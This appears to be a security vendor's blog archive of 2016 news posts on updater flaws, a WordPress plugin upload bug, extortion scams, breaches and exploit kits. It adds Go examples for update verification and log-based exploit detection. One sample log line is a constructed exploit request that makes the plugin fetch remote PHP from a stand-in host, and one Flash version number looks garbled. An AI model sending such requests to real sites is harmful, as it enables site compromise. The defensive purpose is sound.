New Bloatware Vulnerability Found in Lenovo Accelerator Application Updater: Uninstall Recommended
The Lenovo Accelerator Application has been pre-installed on a wide range of Lenovo desktop computers and notebooks shipped with Windows 10. In total, well over 100 different models of Lenovo notebooks and desktops have the Lenovo Accelerator Application installed. Lenovo says the application is used to speed up the launching of Lenovo applications and communicates with the company’s servers to determine whether application updates exist.
The UpdateAgent pings Lenovo’s servers every 10 minutes to check whether updates have been released. However, the application has recently been discovered to contain a security vulnerability that could be exploited by attackers. DuoLabs investigated a number of companies to check for security vulnerabilities in pre-installed software applications and found that Lenovo’s UpdateAgent was particularly vulnerable to attacks.
DuoLabs reported that the updater had “no native security,” and that “executables and manifests are transmitted in the clear and no code-signing checks are enforced.” The security flaws could allow an attacker to intercept these communications and manipulate responses, even allowing malicious software updates to be performed.
Lenovo has responded by issuing an advisory recommending all owners of the affected devices uninstall the software application. This is a straightforward task that can be performed by accessing the Apps and Features application on a Windows 10 computer, selecting the Lenovo Accelerator Application and manually uninstalling the program.
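The defect DuoLabs describes (cleartext transport, no signature or hash check) is exactly what an updater's verification step has to close. As an added example (not Lenovo's or DuoLabs' code), the Go program below assumes a constructed JSON manifest format, an Ed25519 release key pinned in the client and hypothetical product names and URLs, and shows a genuine update being accepted while a swapped binary, an attacker-signed manifest and a plaintext download URL are each rejected:

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Manifest is a constructed stand-in for an update manifest.
type Manifest struct {
	Product string `json:"product"`
	Version string `json:"version"`
	URL     string `json:"url"`    // where the client downloads the package
	SHA256  string `json:"sha256"` // hex digest the downloaded bytes must match
}

// SignedManifest is the manifest as transmitted: body plus a detached Ed25519 signature.
type SignedManifest struct {
	Body []byte
	Sig  []byte
}

func sha256Hex(data []byte) string {
	return fmt.Sprintf("%x", sha256.Sum256(data))
}

// SignManifest is the build-server side, included only so the example runs stand-alone.
func SignManifest(priv ed25519.PrivateKey, m Manifest) (SignedManifest, error) {
	body, err := json.Marshal(m)
	if err != nil {
		return SignedManifest{}, err
	}
	return SignedManifest{Body: body, Sig: ed25519.Sign(priv, body)}, nil
}

// VerifyUpdate is the client-side check an updater must pass before a download is
// written to disk or run: manifest signature under the pinned vendor key, HTTPS
// download URL, and executable hash matching the signed manifest.
func VerifyUpdate(vendorPub ed25519.PublicKey, sm SignedManifest, exe []byte) (*Manifest, error) {
	if !ed25519.Verify(vendorPub, sm.Body, sm.Sig) {
		return nil, errors.New("manifest signature does not verify under pinned vendor key")
	}
	var m Manifest
	if err := json.Unmarshal(sm.Body, &m); err != nil {
		return nil, fmt.Errorf("manifest unparseable: %w", err)
	}
	if u, err := url.Parse(m.URL); err != nil || u.Scheme != "https" || u.Host == "" {
		return nil, errors.New("download URL is not https")
	}
	if !strings.EqualFold(sha256Hex(exe), m.SHA256) {
		return nil, errors.New("executable hash does not match signed manifest")
	}
	return &m, nil
}

type Results struct {
	Genuine, SwappedExe, ForgedManifest, PlaintextURL error // nil means the update was accepted
}

// RunScenarios exercises VerifyUpdate with constructed data.
func RunScenarios() (Results, error) {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Results{}, err
	}
	genuine := []byte("constructed stand-in for the real update binary")
	evil := []byte("constructed stand-in for an attacker-supplied binary")
	m := Manifest{Product: "ExampleUpdater", Version: "1.2.3",
		URL: "https://updates.example.com/example-1.2.3.exe", SHA256: sha256Hex(genuine)}
	signed, _ := SignManifest(vendorPriv, m)
	var r Results
	_, r.Genuine = VerifyUpdate(vendorPub, signed, genuine) // genuine manifest and binary: accepted
	// Binary swapped in transit; the signed hash no longer matches.
	_, r.SwappedExe = VerifyUpdate(vendorPub, signed, evil)
	// Attacker rewrites the hash and signs with their own key; the pinned key rejects it.
	_, attackerPriv, _ := ed25519.GenerateKey(rand.Reader)
	forged := Manifest{Product: m.Product, Version: m.Version, URL: m.URL, SHA256: sha256Hex(evil)}
	forgedSigned, _ := SignManifest(attackerPriv, forged)
	_, r.ForgedManifest = VerifyUpdate(vendorPub, forgedSigned, evil)
	// Even a vendor-signed manifest is refused if it would fetch over plaintext HTTP.
	plain := Manifest{Product: m.Product, Version: m.Version, URL: "http://updates.example.com/example-1.2.3.exe", SHA256: m.SHA256}
	plainSigned, _ := SignManifest(vendorPriv, plain)
	_, r.PlaintextURL = VerifyUpdate(vendorPub, plainSigned, genuine)
	return r, nil
}

func main() {
	r, err := RunScenarios()
	if err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", r) // nil fields were accepted, error fields were rejected
}
```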
A new WordPress plugin vulnerability was recently uncovered that is being actively exploited. The vulnerability affects the WP Mobile Detector plugin, which is used to determine whether a website is being viewed on a desktop or mobile device. The plugin then serves a compatible WordPress theme.
The plugin was one of the first to be able to distinguish whether a device was a standard mobile phone or a smartphone, and as of the start of May, the plugin had been installed on more than 10,000 WordPress websites.
WP Mobile Detector WordPress Plugin Vulnerability Exploited to Install Porn Spam Doorways
The WordPress plugin vulnerability was detected by Plugin Vulnerabilities, which noticed a HEAD request for a file called /wp-mobile-detector/resize.php, even though the plugin had not been installed on the site.
Researchers at Plugin Vulnerabilities concluded that the request was made by an individual attempting to determine whether the plugin had been installed in order to exploit a vulnerability. After searching for reports of a known vulnerability and finding none, researchers investigated further and discovered the plugin had an arbitrary file upload vulnerability.
The vulnerability is straightforward to exploit and can be used to upload malicious files to the cache directory, host spam content, redirect users to malicious websites, or install malware. Since the plugin performed no checks to validate input from untrusted sources, an attacker would be able to insert a src variable containing a malicious URL and PHP code.
Many of the infections uncovered so far have involved the installation of porn spam doorways. Sucuri reports that the WordPress plugin vulnerability has been exploited since May 27.
Following the discovery of the WP Mobile Detector plugin flaw last week, the plugin was temporarily removed from the WordPress plugin directory. The developer of the WP Mobile Detector plugin has now fixed the vulnerability. Any site owner that has the plugin installed should immediately update to version 3.6.
However, simply updating to the latest version of the plugin will not remove malware if it has already been installed. If web shells have already been installed, attackers could still have an active backdoor to the site allowing them to continue to upload malicious files or inject malicious code into webpages.
One of the easiest ways to check to see if a site has been compromised is to look for a directory called gopni3g in the site root. The directory will contain a story.php file, and “.htaccess and subdirectories with spammy files and templates,” according to Sucuri researcher Douglas Santos.
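As an added example (not Plugin Vulnerabilities' or Sucuri's tooling), the Go program below scans constructed access-log lines for the two request shapes described above, the bare fingerprinting request for resize.php and a request whose src parameter is a remote URL, and checks a site root for the gopni3g directory and its story.php. The log lines and IP addresses are constructed, and the plugin path under wp-content/plugins is assumed:

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"net/url"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Finding is one suspicious request against the plugin's resize.php.
type Finding struct {
	Client string
	Method string
	Kind   string // "probe": resize.php hit with no src; "remote-src": src is a full URL
}

// requestLine pulls client IP, method and request target out of a common or
// combined log format line; the remaining fields are not needed here.
var requestLine = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+"`)

// ScanAccessLog flags the bare request used to fingerprint whether the plugin is
// installed, and any request whose src parameter is a remote URL, i.e. an attempt
// to make resize.php fetch and cache a file from elsewhere. A local image path in
// src is normal plugin use and is not flagged.
func ScanAccessLog(log string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		m := requestLine.FindStringSubmatch(sc.Text())
		if m == nil {
			continue
		}
		client, method, target := m[1], m[2], m[3]
		u, err := url.Parse(target)
		if err != nil || !strings.HasSuffix(u.Path, "/wp-mobile-detector/resize.php") {
			continue
		}
		src := u.Query().Get("src")
		if src == "" {
			out = append(out, Finding{Client: client, Method: method, Kind: "probe"})
			continue
		}
		if s, err := url.Parse(src); err == nil && s.Scheme != "" && s.Host != "" {
			out = append(out, Finding{Client: client, Method: method, Kind: "remote-src"})
		}
	}
	return out
}

// CheckDoorway reports whether the post-exploitation artefact Sucuri described,
// a gopni3g directory in the site root, is present and whether it holds story.php.
func CheckDoorway(siteRoot string) (bool, bool, error) {
	dir := filepath.Join(siteRoot, "gopni3g")
	info, err := os.Stat(dir)
	if errors.Is(err, os.ErrNotExist) {
		return false, false, nil
	}
	if err != nil {
		return false, false, err
	}
	if !info.IsDir() {
		return false, false, nil
	}
	_, err = os.Stat(filepath.Join(dir, "story.php"))
	if errors.Is(err, os.ErrNotExist) {
		return true, false, nil
	}
	return true, err == nil, err
}

// SampleLog is constructed access-log data in combined format using documentation IP ranges.
const SampleLog = `203.0.113.5 - - [27/May/2016:10:14:02 +0000] "HEAD /wp-content/plugins/wp-mobile-detector/resize.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [27/May/2016:10:14:09 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.7/img.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [27/May/2016:10:15:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/photo.jpg HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.11 - - [27/May/2016:10:15:30 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
`

func main() {
	for _, f := range ScanAccessLog(SampleLog) {
		fmt.Printf("%-12s %-4s %s\n", f.Client, f.Method, f.Kind)
	}
	found, hasStory, err := CheckDoorway(".") // point this at the WordPress site root
	fmt.Println("gopni3g present:", found, "story.php present:", hasStory, "error:", err)
}
```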
The Federal Bureau of Investigation (FBI) has issued a new security alert warning of a new wave of extortion email schemes. The alert was issued after its Internet Crime Complaint Center (IC3) started receiving multiple reports from individuals who had been threatened with the exposure of their sensitive data.
Cybercriminals are quick to respond to large-scale data breaches and use the fear surrounding the attacks to scam individuals into paying ransoms, clicking on links to malicious websites, or opening infected email attachments. In recent weeks, the Internet has been awash with news reports of major data breaches that have hit networking sites and a number of popular Internet platforms.
Major data breaches affected LinkedIn, MySpace, and Tumblr, and while the stolen data are old, hundreds of millions of individuals have been affected.
These cyberattacks occurred in 2012 and 2013, although the data stolen in the attacks have just been listed for sale online. These major data breaches had gone undiscovered until recently.
Extortion Email Schemes Threaten Exposure of Sensitive Data
Due to the volume of logins that were exposed in these attacks and the popularity of the sites, many individuals may be concerned that their login credentials may have been obtained by hackers. Cybercriminals are taking advantage of this fear and are sending out huge volumes of spam emails advising individuals that their sensitive data have been obtained.
In the emails, individuals are told that their name, address, telephone number, credit card details, and other highly sensitive data are being held and that they will be distributed to friends and family if a ransom is not paid. The attackers warn their victims that access to social media accounts has been gained and that the attackers have details of all of the victim’s social media contacts.
The scammers are also threatening to email and mail out details of credit card transactions and internet activity to friends, family, and employers, suggesting that the payment to prevent this from happening will be much lower than the cost of a divorce, and low in comparison to the effect it will have on relationships with friends and on social standing.
To stop the distribution of these data, victims are required to pay the attackers anywhere from 2 to 5 Bitcoin – between $250 and $1,200. A Bitcoin address to which the payment must be sent is included in the email. This ensures the transaction remains anonymous.
After analyzing the extortion email schemes, the FBI has concluded that the attacks are the work of multiple individuals. The FBI has advised against paying the ransoms as this will only ensure that this criminal activity continues. Paying a ransom is no guarantee that further demands will not be received.
Any person receiving an email that they believe to be an extortion email scheme should contact their local FBI office and send a copy of the email with the subject “extortion E-mail scheme,” along with details of the Bitcoin address where payment has been asked to be sent.
Extortion email schemes are often sent out randomly in spam email; however, responding to an email will alert the attacker that the email account is active and is being checked. The best course of action is to ignore the email, to log into social media accounts and change all passwords, and to carefully monitor bank accounts and credit card statements. The FBI also advises individuals to ensure social media accounts are configured with the highest level of privacy settings and to be extremely careful about sharing any sensitive data online.
On May 12, the microblogging website Tumblr notified users of a data breach that occurred in 2013. The company had kept quiet about the number of site users that were affected, although it has since emerged that 65 million account credentials were stolen in the Tumblr data breach. Stolen email addresses and passwords were recently offered for sale on a Darknet marketplace called TheRealDeal.
Tumblr Data Breach Ranks as One of the 5 Biggest Data Breaches of All Time
The massive Tumblr data breach may not be the largest ever discovered, but it certainly ranks as one of the biggest, behind the breach of 360 million MySpace account details, the theft of 164 million LinkedIn account credentials, and the 152 million-record Adobe breach. All of these huge data breaches occurred in 2013 with the exception of the LinkedIn breach, which happened a year earlier.
These breaches have something else in common. They were all discovered recently and the stolen data from all four data breaches have been listed for sale on illegal Darknet marketplaces by the same individual: a Russian hacker with the account “peace_of_mind” – more commonly known as “Peace”. It is not clear whether this individual is responsible for all four of these data breaches, but he/she appears to have now obtained all of the data.
The person responsible for the theft appears to have been sitting on the data for some time as, according to Tumblr, the login credentials do not appear to have been used.
Fortunately, the passwords were salted and hashed. Unfortunately, it would appear that the SHA1 hashing algorithm was used, which is not as secure as the latest algorithms. This means that hackers could potentially crack the passwords, although the salting offers some additional protection for individuals affected by the Tumblr data breach. As a precaution, site users who joined the website in 2013 or earlier should log in and change their passwords.
Do You Reuse Passwords on Multiple Sites?
Even if victims of the Tumblr data breach have changed their password on the site before 2013, they may still be at risk of having their online accounts compromised if their password has been used for multiple online accounts.
If you have been affected by the Adobe, LinkedIn, MySpace, or Tumblr data breach, and there is a possibility that you have reused passwords on any other platforms, it is strongly advisable to change all of your passwords.
Peace may not be the only individual currently in possession of the data, and it is highly unlikely that the data will only be sold to one individual.
If you are unsure whether your login credentials have been compromised, you can check by entering your email address or username on haveibeenpwned.com.
A new phishing activity report published by the Anti-Phishing Working Group (APWG) shows that the threat from phishing websites is greater than any other time in the history of the Internet. The latest phishing activity report shows that in the past six months, the number of phishing websites has increased by a staggering 250%. Most of the new websites were detected in March 2016.
The Rising Threat from Phishing Websites Should Not Be Ignored
APWG was founded in 2003 in response to the rise in cybercrime and the use of phishing to attack consumers. The purpose of the organization is to unify the global response to cybercriminal activity, monitor the latest threats, and share data to better protect businesses and consumers.
In 2004, APWG started tracking phishing and reporting on the growing threat from phishing websites. During the past 12 years, the number of phishing websites being created by cybercriminals has grown steadily; however, the past six months have seen a massive rise in new websites that trick users into revealing sensitive data.
APWG reports that there is an increase in new malicious websites around the holiday season. In the run up to the holiday period when online shopping increases and Internet traffic spikes, there are more opportunities to relieve online shoppers of their credit card details, login credentials, and other sensitive data.
In late 2015, cybercriminals increased their efforts and there was the usual spike in the number of new phishing websites. However, after the holiday period ended APWG expected activity to reduce. That didn’t happen. New sites were still being created at elevated levels.
In the first quarter of 2016, APWG detected 289,371 new phishing websites. However, almost half of the new websites – 123,555 of them – were detected in March 2016. Aside from a slight dip in February, the number of new websites created has increased each month. March saw almost twice the number of new sites created in December. The figures for Q1 and for March were the highest ever seen.
Retail and Financial Sectors Most Frequently Targeted by Phishers
Phishers tend to favor well-known brands, and the phishing activity report indicates little has changed in this regard. Between 406 and 431 brands are targeted each month. Most of the new sites target the retail industry, which accounts for 42.71% of the new phishing websites detected in the first quarter of 2016. The financial sector was second with 18.67% of new sites, followed by the payment service industry with 14.74% and the ISP industry with 12.01%. The remaining 11.87% of new sites targeted a wide range of industries. The United States is the most targeted country and hosts the most phishing websites.
While phishing websites are now favored by cybercriminals, emails continue to be used to send malicious links and malware-infected attachments to consumers and businesses. In January, 99,384 phishing email reports were sent to APWG. The number increased to over 229,000 in February and stayed at that level in March.
APWG also tracked malware infections. In the first quarter of the year, 20 million malware samples were intercepted – an average of 6.67 million malware samples a month.
The report shows the seriousness of the threat from phishing websites and how critical it is for businesses to take action to prevent end users from visiting malicious websites.
One of the best ways that businesses can reduce the risk of employees visiting phishing websites is to use a web filtering solution. By controlling the sites that can be accessed by employees, the risk of phishing, malware infections, and ransomware attacks can be greatly reduced.
Surprisingly, after ESET sent a request for the TeslaCrypt ransomware master key to the criminal gang behind the attacks, the gang responded by making the decryption key public and even issued an apology. The surprise move signals the end of the ransomware, which was used primarily to target gamers.
TeslaCrypt Ransomware Master Key Released
So does the release of the TeslaCrypt ransomware master key mean that the attacks will now stop? The answer to that is a little complicated. Attacks using TeslaCrypt will slow and stop soon, and even if some individuals have their computer files locked by the ransomware they will not need to pay a ransom.
Once the TeslaCrypt ransomware master key was made public, security companies started work on decryption tools to unlock infections. ESET has added the key to its TeslaCrypt decryption tool, and Kaspersky Lab similarly used the master key to update the decryption tool it had been using to unlock earlier versions of the ransomware.
That does not mean that the criminal gang behind the campaign will stop its malicious activity. It just means that the gang will stop using TeslaCrypt. There are many other types of ransomware that can be used for attacks. In fact, it would appear that TeslaCrypt has now simply been replaced with a new form of ransomware called CryptXXX. According to ESET, many of the distributors of TeslaCrypt have already switched to CryptXXX.
Under normal circumstances, contacting a criminal gang and asking for the TeslaCrypt ransomware master key would not have worked. Attackers running profitable ransomware campaigns are unlikely to respond to a polite request asking to unlock an infection without paying a ransom, let alone supply a master key that can be used to unlock all infections.
The reason for the release is that TeslaCrypt was already being phased out. ESET researcher Igor Kabina noticed that TeslaCrypt infections were slowing, which signaled that either the gang behind the ransomware was phasing it out in favor of a new malware, or that a new and updated version of TeslaCrypt would soon be released. Kabina decided to contact the attackers through the channels set up to allow victims to contact the gang and pay the ransom.
Kabina asked for the private decryption keys to unlock all four versions of the ransomware. He was answered within one day and was provided the key for the version he claimed to have been infected with. He then sent another message requesting the release of the latest key to unlock v4 of the ransomware, and noticed on the TeslaCrypt page that the gang had announced that the project had been closed. The universal key had been posted on an anonymous .onion page that can be accessed using the Tor browser.
There is a constant battle between security companies and ransomware developers. Oftentimes, ransomware variants contain flaws that allow antivirus companies to develop decryption tools. When these tools are released attackers work rapidly to repair the security flaw and release a new, more robust version of the ransomware. This was the case with TeslaCrypt. Flaws in the first version allowed a tool to be developed. A decryption tool was released, and version 2 of the ransomware was released. TeslaCrypt is now on the fourth version.
As with Cryptowall, TeslaCrypt has now been shut down; however, CryptXXX is still very much active and is still being updated. Furthermore, the attackers have learnt from their mistakes and have developed CryptXXX to be a much harder nut to crack.
CryptXXX is run alongside a program that monitors the system on which it is run to check if it is in a virtual environment or sandbox or otherwise being probed. If abnormal behavior is identified, the encryption routine is restarted. CryptXXX is also spread via spam email, exploit kits, and malvertising. This means that it is much easier to spread and more attacks are likely to occur. Companies and individuals therefore face a much higher risk of an attack.
The release of the TeslaCrypt ransomware master key is therefore only good news if you have been infected with TeslaCrypt. With the move to CryptXXX it is even more important to have solutions in place to prevent attacks, and a plan in place to deal with an attack when it occurs.
A new study has recently been published showing the impact of security breaches on brand image, and how the behavior of consumers changes when companies experience data breaches that expose private data.
Cyberattacks now take place with such frequency that data breaches are to be expected. It is no longer a case of whether a security breach will occur, but when it will happen. Even with the best protections in place to protect sensitive data, breaches will still occur.
Many consumers are aware that the current threat levels are greater than ever and that cyberattacks will occur. However, how do consumers react to breaches of their personal information? Do they forgive and forget or are they taking their business elsewhere?
What is the Impact of Security Breaches on Brand Image?
The FireEye study set out to examine the impact of security breaches on brand image. 2,000 interviews were conducted with consumers in the United States to find out whether security incidents changed behavior and whether data breaches altered perceptions of companies and trust in brands.
The results of the survey clearly show that the failure to invest in robust cybersecurity defenses can have a major impact on revenue. 76% of surveyed consumers claimed they would take their business elsewhere if they believed a company’s data handling practices were poor or that the company was negligent with regard to data security.
75% of respondents said they would likely stop making purchases from a company if they felt that a security incident resulted from a failure of the company to prioritize cybersecurity.
Loss of business is not the only problem companies will face following a data breach. If a breach of personal information occurs and data are used by criminals for identity theft or fraud, 59% of consumers would take legal action to recover losses.
Even when companies take action to mitigate the risk of losses being suffered by consumers – such as providing identity theft protection services – brand image remains tarnished. Reputation damage after a data breach is suffered regardless of the actions taken by companies to mitigate risk. It can also take a considerable amount of time to regain consumers’ trust. More than half of respondents (54%) said that their impression of companies was negatively impacted after a security breach occurred.
Fast action following a data breach can help to restore confidence, but this is expected by consumers. The survey showed that 90% of consumers expect to be notified of a breach of data within 24 hours of an attack taking place, yet this is something that rarely happens. All too often consumers are made to wait weeks before they are informed of a breach of their personal information.
The study also shows that as a result of large-scale breaches consumers are now much less trusting of companies’ ability to keep data secure. They are also much more cautious about providing personal information. 72% of consumers said they now share less information with companies due to the volume of data breaches now being suffered.
The take-home message from the survey is that organizations must do more to protect consumer data and to prevent data breaches from occurring. If companies invest heavily in cybersecurity and can demonstrate to consumers that they take privacy and security seriously, the negative impact of security breaches on brand image is likely to be reduced.
The not-for-profit technology industry association CompTIA recently released its 2016 International Trends in Cybersecurity report after analyzing the current state of cybersecurity and assessing behaviors and techniques currently being used by organizations around the world to tackle the growing risk of cyberattacks.
To compile the report, CompTIA surveyed 1,509 IT security professionals from 12 countries around the world, including Australia, Canada, India, Brazil, Malaysia, Japan, South Africa, the UAE and the UK.
The International Trends in Cybersecurity report shows that information security is still a major concern for IT and business executives, which is perhaps no surprise given the number of cybersecurity threats they now have to deal with. The report showed that over the course of the past 12 months, 73% of organizations had experienced at least one security incident and 60% of those security incidents were classed as serious.
The highest number of security incidents occurred in India, where 94% of companies experienced a security breach in the past 12 months, closely followed by Malaysia on 89%, and Brazil and Mexico with 87% of companies suffering at least one breach. Japan and the UAE fared the best, with just 39% and 40% of companies self-reporting a security breach.
Security incidents involving mobile devices are becoming much more prevalent as the use of the devices increases. 76% of companies across all 12 countries experienced a mobile-related data breach in the past 12 months. In Thailand, 95% of companies had experienced a mobile-related security breach. In the UK, 64% of companies experienced a mobile-related incident. Companies in Japan and the UAE fared the best, with 60% of companies experiencing a breach of mobile data.
Human error continues to be a major cause of security breaches and the situation is getting worse. Companies are tackling the issue with training to improve awareness of cybersecurity issues and ensure security best practices are adopted.
Nearly 80% of managers responsible for data security expect cybersecurity to become even more important over the next two years. The increasing reliance on mobile technology and cloud computing has required a major rethink about how systems and data need to be protected from attack. These were listed as the main drivers behind changes in cybersecurity practices in 10 out of the 12 countries where respondents were located.
To reduce the risk of malware infections from websites, you can avoid certain types of sites that are commonly used by cybercriminals to infect visitors: sites containing pornography, torrent sites, and online marketplaces selling illegal medication, for example. However, while these sites are often compromised with malware or contain malicious code, they are far from the most common sites used by cybercriminals to infect visitors.
The unfortunate reality is that browsing the Internet and only visiting what are perceived to be “safe sites” does not mean that you will not be exposed to malware, malicious code, and exploit kits. Hackers are increasingly compromising seemingly legitimate websites to redirect visitors to sites containing exploit kits that download malware and ransomware.
Two CBS-affiliated news websites were recently discovered to be hosting malicious adverts that redirect visitors to sites containing the Angler Exploit Kit. MSN has been found to host malvertising in the past, as has Yahoo. A study conducted by anti-virus company Symantec revealed that three quarters of websites contain security vulnerabilities that could potentially be exploited to infect visitors with malware.
High Profile Websites Compromised and Used to Deliver Ransomware to Visitors
This week, two new websites were found to have been compromised and were used to infect visitors with malware.
The celebrity gossip website PerezHilton.com may cause problems for celebrities, but this week it was also causing problems for its visitors. The site attracts millions of visitors, yet few would suspect that visiting the site placed them at risk of having their computer files locked with powerful file-encrypting ransomware.
However, that is exactly what has been happening. Hackers compromised an iframe on the site and inserted malicious code which redirected visitors to a website containing the Angler Exploit Kit. Angler probes visitors’ browsers for security vulnerabilities and exploits them, silently downloading a payload of malware. In this case, the Angler Exploit Kit was used to push Bedep malware, which in turn silently downloaded CryptXXX ransomware onto the victims’ devices.
A second malvertising campaign was also conducted that redirected visitors to a different website. The exploit kit used to infect redirected visitors was different, but the end result was the same. A malicious payload was downloaded onto their devices.
Another well-known website was also discovered to have been compromised this week. The website of the world-renowned French film production company Pathé was discovered to have been compromised. Hackers had managed to embed malicious code in one of the webpages on the site. The code also redirected users to a site hosting the Angler Exploit Kit, which similarly was used to infect visitors with CryptXXX ransomware.
How to Reduce the Risk of Malware Infections from Websites
Exploit kits take advantage of security vulnerabilities in browsers. To reduce the risk of malware infections from websites it is essential that browsers are kept up to date. That includes all browser plugins. If no security vulnerabilities exist, there would be nothing for exploit kits to exploit.
However, zero-day vulnerabilities are emerging all the time and software manufacturers are not always quick to develop fixes. Adobe was alerted to a new zero-day vulnerability a few days ago, yet they only just released a fix. During that time, the vulnerability could have been exploited using exploit kits. Cybercriminal gangs are quick to incorporate new zero-day vulnerabilities into their exploit kits and do so faster than software companies can release fixes. Ensuring all updates are installed promptly is a great way to reduce the risk of malware infections from websites, but additional measures need to be taken.
If you really want to improve your – or your company’s – security posture and really reduce the risk of malware infections from websites, you should use a web filtering solution. This is particularly important for businesses to ensure that employees do not inadvertently compromise the network. It can be difficult to ensure that all devices used to connect to the network are kept 100% up to date, 100% of the time.
A web filtering solution can be configured to block malvertising, blacklists can be used to prevent compromised websites from being accessed, and malware downloads can be prevented. Along with good patch management practices, it is possible to effectively reduce the risk of malware infections from websites.
This week, Patch Tuesday saw updates issued to address actively exploited security vulnerabilities in Internet Explorer, along with a swathe of fixes for a number of other critical Microsoft security vulnerabilities. In total, Microsoft issued fixes for 51 vulnerabilities this week spread across 16 security bulletins, half of which were rated as important, the other eight being rated as critical.
The updates tackle vulnerabilities in Microsoft Edge and Internet Explorer, Windows, the Microsoft .NET Framework, and MS Office; however, it is the browser fixes that are the most important. These include actively exploited security vulnerabilities that can be used to compromise computers if users visit websites containing exploit kits.
Security update MS16-051 tackles the CVE-2016-0189 zero-day vulnerability in Internet Explorer, which if exploited, would allow an attacker to gain the same level of privileges as the current user. The flaw could be used to take control of the entire system. The exploit could be used to install new programs on the device, create new accounts, or modify or delete data. The vulnerability lies in how the JScript and VBScript engines handle objects in the computer’s memory.
The IE security vulnerability was brought to the attention of Microsoft by researchers at Symantec, who had discovered an active exploit that was being used alongside spear-phishing attacks in South Korea. Users were being directed to a website containing an exploit kit that had been updated with the IE security vulnerability.
The MS16-052 security update tackles a vulnerability in Microsoft Edge which similarly changes how objects in the memory are handled. These two updates should be prioritized by sysadmins, although all of the updates should be installed as soon as possible. Even the important updates could potentially be exploited and used to gain control of unpatched computers.
Bulletin MS16-054 is also a priority update to patch critical vulnerabilities in Adobe Flash. Since Flash is embedded in both Edge and IE, Microsoft has started issuing updates to address Adobe Flash vulnerabilities. While these security flaws are not believed to have been exploited in the wild, it will not be long before they are included in exploit kits.
Microsoft may have fixed its actively exploited security vulnerabilities, but despite Adobe issuing patches for Acrobat, ColdFusion, and Reader on Tuesday, Flash remains vulnerable to attack. Adobe has yet to issue a patch for an actively exploited Flash security vulnerability (CVE-2016-4117) that affects version 126.96.36.199 and all earlier versions of the platform. This vulnerability has been included in exploit kits and can be used to take control of devices. In total, Adobe fixed 92 separate vulnerabilities in its Tuesday update.
Between Microsoft and Adobe, 143 vulnerabilities have been addressed this week. With hackers quick to add the vulnerabilities to website exploit kits, it is essential that patches are installed rapidly. These actively exploited security vulnerabilities also highlight the importance of using a web filtering solution to prevent users from visiting compromised websites where the vulnerabilities can be exploited.
Finding a web security service for MSPs can be a time consuming process. There are a number of solutions that allow MSPs to keep their clients protected from malware and reduce the risk from internal and external threats, yet many are far from ideal for use by MSPs.
The ideal web security service for MSPs must have a relatively low cost of ownership. Clients may be more than willing to implement a web security service to deal with the growing range of web-borne threats, but the cost of implementation is a key factor.
Many solutions offer all the necessary benefits for the client, but are not practical for use by MSPs. The time taken to install web security solutions and to configure them for each client can reduce profitability. The best web security service for MSPs needs to be easy to install and maintain, and have a low management overhead.
Low-cost solutions that are quick to install and easy to maintain allow MSPs to incorporate them easily into existing packages to create a more comprehensive Internet security service. This can increase the value provided to clients, boost client revenue, and help MSPs to win more business and differentiate their company in the marketplace.
The ideal web security service for MSPs is available as a white label. This allows the service to be easily incorporated into existing packages. White labeling allows MSPs to strengthen their own brand image rather than promoting someone else’s.
Many providers of a web security service for MSPs fall down on customer support. If any issues are experienced, it is essential that an MSP can provide rapid solutions. Industry-leading technical support is essential.
WebTitan Cloud – A Web Security Service for MSPs That Ticks All the Right Boxes
WebTitan Cloud is an enterprise-class web filtering solution for MSPs that can be used to enforce clients’ acceptable use policies and control the content that can be accessed via their wired and wireless networks.
Our DNS-based web filtering solution allows organizations to prevent phishing, stop malware downloads, protect against ransomware and botnet infections, and block spyware and adware. Controls prevent the bypassing of the content filter by blocking anonymizer services. Encrypted web traffic is also inspected.
Implementation could not be any easier. There is no need for any hardware purchases or software downloads. All that is required is a change to the DNS to point to our servers and the Internet can be filtered in under 2 minutes.
Configuring each client to incorporate their AUPs is also a quick and easy process requiring no technical expertise. Highly granular controls ensure AUPs can be quickly and easily applied. There is no need to use on-premises support teams. Everything can be monitored via the control panel from any Internet browser. There is no hardware or software to maintain and no patches to apply, reducing management overhead considerably. Cloud keys can be supplied to allow guests to bypass organization-wide content control settings, with time limits applied to prevent abuse.
Reporting is effortless. A full suite of pre-defined reports can be generated automatically and scheduled for each client to allow Internet access to be carefully monitored.
We also offer fully white-labeled solutions for MSPs, allowing logos, branding, and corporate color schemes to be easily incorporated. We are also more than happy to allow WebTitan Cloud to be hosted within an MSP’s infrastructure.
To find out more about why WebTitan Cloud is a game-changing web security service for MSPs, contact our sales team today!
Over the past two weeks there have been three worrying instances of the Angler exploit kit being used to infect website visitors with malware and ransomware. Cybercriminals are increasingly using exploit kits to deliver their malicious payloads and all organizations need to be aware of the risk.
Why AUPs May Not Be Sufficient to Keep Networks Secure
Many companies advise employees of the types of websites that can be accessed via work networks and which are forbidden. Typically, employees are banned from visiting pornographic websites, using the Internet for the sharing of copyright-protected material, installing shareware or other unauthorized software, and using unauthorized web applications and gaming sites.
Employees are provided with a document which they are required to read and sign. They are informed of the actions that will be taken for breaching the rules: verbal and written warnings for example, and in some cases, instant dismissal. These AUPs are usually effective and employees do heed the warnings if they value their jobs.
If an employee breaches the AUPs and accesses pornography for instance, action can be taken against that individual. It is probable that no harm will have been caused and the matter can be dealt with by HR.
However, if an employee breaches AUPs and visits a website that has been compromised with malware or installs shareware that includes malicious files, taking action against the employee will not undo the damage caused.
To better protect networks, AUPs should be enforced with a software solution. By implementing a web filtering solution, HR departments can ensure that inappropriate website content is not accessed, while IT departments can be prevented from having to deal with malware infections.
